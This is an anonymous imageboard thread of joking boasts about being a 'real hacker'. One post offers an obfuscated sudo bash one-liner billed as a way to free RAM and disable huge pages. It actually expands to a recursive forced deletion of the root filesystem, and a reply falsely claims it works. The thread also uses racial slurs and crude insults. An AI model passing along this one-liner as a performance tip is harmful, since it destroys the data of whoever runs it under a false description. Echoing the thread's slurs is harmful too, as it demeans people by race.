Are U a Real Hacker?

Prove it.




i made templeos

I don't mean to brag but one time I scored a gibson.

I know python

Im a white hat hacker

I can open cmd and systree.

Oh shit nigga come down

Heh... Check your phone. I own everything now kid... When you play with fire, you only get burned...

Great, Sup Forumsuys
Now I'm spelinking this:
www deepdotweb com

Got any similar pages on the un-deep-web ?


5 images to prove I haked a guy once






Microsoft Unix

He's anti hacker.
He's like the jesus christ of programing.
He beat cia niggers that were trying to fill the temple with backdoors just like Jesus beat the fucking merchant.

easy, huge page table and same kernel page merging turn off without kernel modules in a bash one liner:

mem=reserve ; function memclean () { r\$ram_clean \-f`echo r` \/ --no-$(printf "p%s-root" $mem) ; } && sudo memclean now 2>1

(it resets after you dont see 10% RAM reduction after reboot)

I have a CVE and a 0day in some shitty php CMS

>Skids around on IRC
u r real hacker!!!!!

>i use the word skid im epice hakre xDDdDDdDD

sure, check out this 7

I fixed some electronic glow foam sticks at a dance party by taking out the electrical component, stripping the wires with my teeth, and tying them around the solder points they had broken off of - after consuming nearly a fifth of bourbon. Am I hacker yet?

ooh nifty, it actually does clean up RAM on my box

any way to make it stick on reboot?

spotted the gamer
you have to go back

I used to scare people with that. Good old tree c:/

I know how to startup kali linux


>press enter to be hacked

Samefag who's mad he got made fun of.

screenfetch -D "Arch Linux" && ls -l

muh arrows